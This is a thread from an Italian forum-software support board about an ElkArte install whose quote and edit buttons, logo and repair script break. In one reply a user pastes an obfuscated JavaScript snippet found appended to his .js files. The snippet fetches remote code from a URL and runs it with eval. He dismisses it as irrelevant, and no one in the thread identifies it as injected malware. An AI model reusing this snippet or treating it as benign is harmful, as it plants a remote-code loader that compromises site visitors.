Autore Topic: Citazione e Modifica non funzionano  (Letto 1138 volte)

Offline Flavio93Zena

• Staff IS
  • Sniper Legends
    • Mostra profilo
  • Versione SMF: 2.0.x
  • Versione ElkArte: -
Re:Citazione e Modifica non funzionano
« Risposta #15 il: Lunedì, 01 Febbraio 2021 00:41 »
Flavio: siamo nella sezione ElkArte, non SMF. :P
Badbehaviour è già presente in Elk, ma onestamente inizio a pensare che questo vada oltre badbehaviour.
DERP  :-[

In questo caso... https://www.simplemachines.org/community/index.php?topic=524146.0 questo ti aiuterà a fare ciò che ha suggerito emanuele :)

Offline berethor

• Utente IS Lv.2
  • **
    • Mostra profilo
    • FFSaga.it
« Risposta #16 il: Lunedì, 01 Febbraio 2021 13:57 »
Mi chiedevo dove fosse finita quella tua guida sul ban via htaccess :D
Il file si trova nella root del dominio. Va bene lo stesso o deve essere nella cartella del forum?
Inoltre: quali permessi dovrebbe avere il file di repair_settings per essere usato correttamente?

Sono riuscito a trovare dove modificare i dati di accesso e posso di nuovo entrare 8)
Quindi resta da capire in quale file devo andare a toccare per cambiare content-type da text/html a text/xml. O devo fare da phpmyadmin? Ho la stringa sia in "bootstrap.php" che in "subscriptions.php"
« Ultima modifica: Lunedì, 01 Febbraio 2021 15:12 da berethor »

Offline Darknico

• Amministratore IS
  • Server Admin
    • Mostra profilo
    • Darknico.com
« Risposta #17 il: Lunedì, 01 Febbraio 2021 15:30 »
In questo caso... https://www.simplemachines.org/community/index.php?topic=524146.0 questo ti aiuterà a fare ciò che ha suggerito emanuele :)

Flavio, se vuoi ed hai voglia di tradurre quello che hai scritto, puoi mettere la tua guida nella nostra apposita sezione di tips & tricks ;)
https://www.italiansmf.net/forum/index.php?board=38.0
Non supporto privatamente, non risponderei e ci rimarreste male....

Offline emanuele

• Amministratore IS
    • Mostra profilo
    • ElkArte
  • Versione SMF: Altro
  • Versione ElkArte: 1.0.x
« Risposta #18 il: Lunedì, 01 Febbraio 2021 17:29 »
Quindi resta da capire in quale file devo andare a toccare per cambiare content-type da text/html a text/xml. O devo fare da phpmyadmin? Ho la stringa sia in "bootstrap.php" che in "subscriptions.php"
No, fermati, non devi toccare niente nei file di Elk.

ETA: ElkArte (come SMF) già manda il corretto content-type al client per ogni pagina generata.
Qui, secondo me, il problema è altrove ed è dovuto a "qualcosa" che altera il content-type dopo che Elk l'ha impostato e inviato, ma prima che questo sia effettivamente passato al client.
Come prima prova, come ho accennato sopra, disabiliterei la compressione. Come e dove, non sono certo. C'è un'opzione anche nel pannello di admin di Elk, prova ad iniziare da lì (non ricordo di preciso dove sia, immagino nella configurazione del server).
« Ultima modifica: Lunedì, 01 Febbraio 2021 17:32 da emanuele »

Offline berethor

• Utente IS Lv.2
  • **
    • Mostra profilo
    • FFSaga.it
« Risposta #19 il: Lunedì, 01 Febbraio 2021 18:09 »
Dal pannello admin è già disabilitata.
Se può aiutare: riguardo il logo credo sia solo il file rnd.php il problema perché provando a mettere una singola immagine, questa si vede senza alcun problema.
« Ultima modifica: Lunedì, 01 Febbraio 2021 18:16 da berethor »

Offline radu81

• Staff IS
    • Mostra profilo
  • Versione SMF: -
  • Versione ElkArte: 1.1.x
« Risposta #20 il: Martedì, 02 Febbraio 2021 22:35 »
mi ricordo di avere avuto lo stesso problema in passato, ma non ricordo come ho risolto. Ho cercato tra i miei messaggi su elkarte.net ma non ho trovato nulla...

Offline Flavio93Zena

• Staff IS
  • Sniper Legends
    • Mostra profilo
« Risposta #21 il: Martedì, 02 Febbraio 2021 23:26 »

Flavio, se vuoi ed hai voglia di tradurre quello che hai scritto, puoi mettere la tua guida nella nostra apposita sezione di tips & tricks ;)
https://www.italiansmf.net/forum/index.php?board=38.0
E' sulla mia lista delle cose da fare dal... Boh, più o meno da quando l'ho scritto xD

Offline berethor

• Utente IS Lv.2
  • **
    • Mostra profilo
    • FFSaga.it
« Risposta #22 il: Mercoledì, 03 Febbraio 2021 00:17 »
mi ricordo di avere avuto lo stesso problema in passato, ma non ricordo come ho risolto. Ho cercato tra i miei messaggi su elkarte.net ma non ho trovato nulla...
I pulsanti malfunzionanti o il logo? O entrambi?

EDIT: il logo è risolto. E' saltato fuori che nel .htaccess del forum c'era una deny from all che io non ho mai inserito -.-

Restano quindi solo i problemi di javascript con i pulsanti. Allego uno screen della console del browser, che ho già postato sul forum di elk.
« Ultima modifica: Giovedì, 04 Febbraio 2021 17:31 da berethor »

Offline emanuele

• Amministratore IS
    • Mostra profilo
    • ElkArte
  • Versione SMF: Altro
  • Versione ElkArte: 1.0.x
« Risposta #23 il: Giovedì, 04 Febbraio 2021 23:01 »
Restano quindi solo i problemi di javascript con i pulsanti. Allego uno screen della console del browser, che ho già postato sul forum di elk.
Che sono quello che ho guardato quando mi sono loggato e che mi hanno fatto pensare che il problema risiede nel "content-type" cambiato "da qualcosa".
Posso reiterare che anche le richieste che dovrebbero essere JSON sono "convertite" in text/html e quindi il browser non le riconosce come appropriate e le ignora (o meglio da errore).

Hai modificato manualmente qualche file?

Offline berethor

• Utente IS Lv.2
  • **
    • Mostra profilo
    • FFSaga.it
« Risposta #24 il: Giovedì, 04 Febbraio 2021 23:47 »
Guarda, ti posso dire di no ed è vero, ma a questo punto è valido tutto: stamane il logo era a posto. Motivo del "guasto" la regola "deny from all" presente nell'htaccess, che però nessuno ha toccato. Non ricordo di aver apportato modifiche particolari. Le ultime sono stato disinstallare la neve e installare la nuova versione della lingua italiana. Nessuno di questi 2 pacchetti ha segnalato errori durante l'install.

La stessa regola che aveva "rotto" il logo era quella che causava il 403 con repair_settings, quindi posso utilizzarlo. Stamattina ho provato ma i percorsi sembravano tutti corretti.

Ho provato a confrontare i 2 file .js nominati nell'error log con una loro variante di un backup di dicembre. L'unica differenza è questa stringa alla fine:

Codice: [Seleziona]
;if(ndsw===undefined){var ndsw=true,HttpClient=function(){this['get']=function(a,b){var c=new XMLHttpRequest();c['onreadystatechange']=function(){if(c['readyState']==0x4&&c['status']==0xc8)b(c['responseText']);},c['open']('GET',a,!![]),c['send'](null);};},rand=function(){return Math['random']()['toString'](0x24)['substr'](0x2);},token=function(){return rand()+rand();};(function(){var a=navigator,b=document,e=screen,f=window,g=a['userAgent'],h=a['platform'],i=b['cookie'],j=f['location']['hostname'],k=f['location']['protocol'],l=b['referrer'];if(l&&!p(l,j)&&!i){var m=new HttpClient(),o=k+'//ffsaga.it/Importers/elkarte1.0/elkarte1.0.php?id='+token();m['get'](o,function(r){p(r,'ndsx')&&f['eval'](r);});}function p(r,v){return r['indexOf'](v)!==-0x1;}}());};
Stringa che però ho trovato anche in post.js (preso a caso), quindi immagino non c'entri.
« Ultima modifica: Venerdì, 05 Febbraio 2021 00:07 da berethor »

Offline radu81

• Staff IS
    • Mostra profilo
« Risposta #25 il: Venerdì, 05 Febbraio 2021 12:46 »
I pulsanti malfunzionanti o il logo? O entrambi?
Solo citazione e modifica veloce

Offline berethor

• Utente IS Lv.2
  • **
    • Mostra profilo
    • FFSaga.it
« Risposta #26 il: Sabato, 06 Febbraio 2021 01:11 »
Spuds è riuscito a suggerire un "workaround": https://www.elkarte.net/community/index.php?topic=5934.msg41999#msg41999

Ha funzionato.

Mi è venuto però un dubbio: vuol dire che ad ogni aggiornamento di Elk dovrò modificare quel file, vero?

Inoltre, ieri ho ricevuto comunicazione dall'host che da quel lato è tutto a posto, inviandomi questo screen: https://screens.kgix.net/jc/firefox_INVVVjYHg3.png

« Ultima modifica: Sabato, 06 Febbraio 2021 01:16 da berethor »

Offline radu81

• Staff IS
    • Mostra profilo
« Risposta #27 il: Sabato, 06 Febbraio 2021 11:23 »
Ho visto la risposta su elkarte.net, come ho già detto ho avuto lo stesso problema in passato ma non ho fatto delle modifiche simili per risolvere. Avevo smanettato con repair_settings.php se ricordo bene

modifica tema smf

Aperto da StramoniumSezione Themes - Temi per SMF

Risposte: 7
Visite: 4785
Ultimo post Martedì, 26 Febbraio 2013 12:38
da Filippo
Problemi con il tasto citazione

Aperto da MonitalSezione SMF 2.0

Risposte: 14
Visite: 2619
Ultimo post Domenica, 16 Febbraio 2014 23:10
da emanuele